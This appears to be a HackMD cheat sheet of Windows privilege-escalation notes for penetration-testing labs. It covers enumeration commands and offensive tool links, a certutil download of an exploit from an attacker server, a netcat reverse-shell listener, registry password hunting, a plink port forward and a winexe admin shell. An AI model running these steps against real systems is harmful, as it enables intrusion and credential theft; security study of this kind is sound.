HackMD
Windows Privilege Escalation
tags: windows priv esc
Fuzzy Security reference
Windows Priv Esc Guide -abs
Priv Esc Windows Guide -sushant
Payload all the things
# to get system info use:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# to check patching levels use:
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
# to list drives use:
wmic logicaldisk get caption,description,providername
# show current user
whoami
# show current privileges
whoami /priv
# show groups for current user
whoami /groups
# show users on the machine
net user
# show info for user x
net user x
# show info for group x
net localgroup x
# show arp table
arp -a
# show routing table
route print
# network statistics
netstat -ano
# see defender status (sc is service control)
sc query windefend
# see all services running
sc queryex type= service
# see state of fw through either of these two commands
netsh firewall show state
netsh advfirewall firewall dump
# see config
netsh firewall show config
Automated Tools Overview
WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Sherlock - https://github.com/rasta-mouse/Sherlock
Watson - https://github.com/rasta-mouse/Watson
PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
JAWS - https://github.com/411Hall/JAWS
Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
Seatbelt - https://github.com/GhostPack/Seatbelt
SharpUp - https://github.com/GhostPack/SharpUp
To install pip incase you don't have it
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py
Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits
Manual Exploitation
We can compile the exploit then set up a web server with python for the victim machine to reach out to and download the file.
# set up the server
python -m SimpleHTTPServer 80 #or
python3 -m HTTP.server
# navigate to the webserver and download the file
certutil -urlcache -f http://ip/filename localName
e.g certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe
We then set up a listener for the victim to connect back to:
# setup a listener on the attacker machine
nc -nlvp 5555
# run the exploit on the victim
ms.exe ip port e.g ms.exe 10.10.14.4 5555
# pops a shell as NT AUTHORITY\SYSTEM
MS10-059 Exploit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
Password abuse
# once we have a shell we can run the command below to look for default passwords stored in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# for machines where a port is only available internally, we can forward that port if we have a low level shell
# we can forward the traffic using plink.exe which can be downloaded from the putty download page
# before using plink, lets edit the ssh_config to allow root login by changing the PermitRootLogin to true under /etc/ssh/sshd_config
# the command syntax is
# plink.exe -l SuperUser -pw Passwd -R internalPort:localhost:ExternalPort External ip
plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4
# we can pop an admin shell with the command below over the previously forwaded port
winexe -U Administrator%Passwd //127.0.0.1 "cmd.exe"
Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
